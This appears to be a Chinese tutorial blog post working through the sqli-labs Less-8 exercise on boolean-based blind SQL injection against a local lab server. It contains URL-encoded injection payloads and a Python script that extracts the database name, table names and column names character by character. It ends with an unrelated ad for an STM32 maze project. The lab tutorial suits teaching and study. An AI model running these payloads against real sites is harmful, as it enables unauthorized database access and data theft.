GET_Blind_Boolian Based-single Quetes

在这里插入图片描述

1.首先盲注是一般都是通过页面变化来判断是否存在注入
1)当传入数据正常时 url?id=1’ and 1=1 %23
在这里插入图片描述
2)当传入数据不正常时 url?id=1’ and 1=2 %23
在这里插入图片描述显而易见少了一个 “YOU ARE IN”

那么就很好办,我们就可以就构建payload

2.盲注一般利用 ascii(),substr()

ascii()将字符串转化成ascii码

substr(string,start,length)将字符串截取,第一个参数start从1开始不是0

group_concat()将一个组的内部数据以逗号分隔列出来

3.解析一下·ttp://127.0.0.1/Less-8/?id=1%27%20and%201=2%23

1.SELECT * FROM users WHERE id='1' and 1=2#' LIMIT 0,1这是内部语句
?id=1'这个单引号是为了引入新的语句也就是我们的注入,完整的是一对单引号,但因为添加新的语句,我们又引入的新的单引号,那么后面单引号我们就用%23注释掉这样我们就又恢复一对单引号 

4.接下来就是构造爆数据库
1.http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(database(),1,1))%3E97%20%23
在这里插入图片描述利用二分法猜第一个数据库的第一个字母的ascii大于97,页面显示正常
接下来继续猜,在英文字母中猜

英文和数字的ascii码
a-z:97-122,

baiA-Z:65-90

0-948-57

2.猜数据库的第一ascii小于123发现页面显示正常,因此根据区间可以确定是小写英文,继续利用二分法

在这里插入图片描述3又继续猜小于116还是正常

在这里插入图片描述

4.当猜到115是发现页面报错,这时我们估计这个就是115而115的ascii码是s
在这里插入图片描述以此类推,将剩些的字母猜出来,因为它们的操作都一样反复,我们可以写个脚本代替这些机械动作

import requests 

       
flag=""
for i in range(1,60):
    for j in range(1,130):
        url="http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27emails%27),{},1))={}%20%23".format(i,j)
        上面这个url是用来猜解列表的
        # url= "http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(database(),{},1))={}%20%23".format(i,j)
        这个是用来猜解数据库的
        # url="http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(%20(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database()),{},1))={}%20%23".format(i,j)
        这个是用来猜解数据表的
        response=requests.get(url)
        if "You" in response.text:
            flag=flag+chr(j)
            print(flag)
           

这三个猜解的payload分别是
1.列http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27emails%27),1,1))=105%20%23

2.数据库http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(database(),{},1))={}%20%23".format(i,j)

3.数据表http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(%20(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database()),{},1))={}%20%23".format(i,j)

基于STM32F407,使用DFS算法实现最短迷宫路径检索,分为三种模式:1.DEBUG模式,2. 训练模式,3. 主程序模式 ,DEBUG模式主要分析bug,测量必要数据,训练模式用于DFS算法训练最短路径,并将最短路径以链表形式存储Flash, 主程序模式从Flash中….zip项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值